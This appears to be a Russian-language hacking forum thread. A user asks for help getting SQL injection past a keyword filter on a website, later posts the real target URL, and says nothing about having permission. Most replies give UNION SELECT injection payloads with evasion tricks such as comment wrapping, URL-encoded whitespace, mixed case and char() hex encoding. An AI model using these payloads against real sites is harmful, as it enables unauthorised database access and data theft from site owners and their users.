![]() |
Добрый день.
Наткнулся на странную защиту. Там фильтруются ключевые слова и тэги. Причем крайне коряво, но удачно фильтруется слово SELECT Можно как-то запрос Код:
+union+select+1,2,3,4,5,6+--+Спасибо. |
+union+/*!select*/+1,2,3,4,5,6+--+
+union+%0Aselect+1,2,3,4,5,6+--+ поробуй так |
увы, отфильтровало оба варианта...
Судя по всему там поиск по строке на совпадения. Был, вроде, какой-то способ закодировать в хекс или base64, но я его не знаю, и не смог найти в гугле p.s. А может можно вставить 1 символ чаром? тоесть union+sel(char(101))ct+ ? Это возможно? Как правильно? |
+UnIoN+SeLeCt+1,2,3,4,5+--+
вместо + можно поставить %09 если ещё фильтруется "+" |
Вот как делают профессионалы:
Цитата:
|
Народ, вы не поняли...
В запросе просто ПОИСКОМ ищутся ключевые слова. Поэтому везде, где есть select - срабатывает фильтр... p.s. сканируется адресная строка, и только! Если это обойти - дольше уже не вазникнет проблемм. |
Цитата:
ТС, если идет тупо поиск подстроки - не обойдешь никак. Фильтр может быть корявым, попробуй через POST отправить, но я сомневаюсь, что это сработает... |
+union+char(0x73,0x65,0x6c,0x65,0x63,0x74)+1,2,3,4 ,5+--+
|
Блин, Глебан, давай линк в студию, мы не ванги тут между прочим, ты ещё много-го не понимаешь, и по этому можешь ошибаться, ГОНИ ЛИНК!
Пробуй "WITHOUT UNION" Цитата:
|
Цитата:
http://lugbasket.org.ua/php/game.php?id=12 aydin-ka, твой вариант - вообще не отработал как запрос. mailbrush, пост фильтруется, кукие - не используется. |
| Время: 00:21 |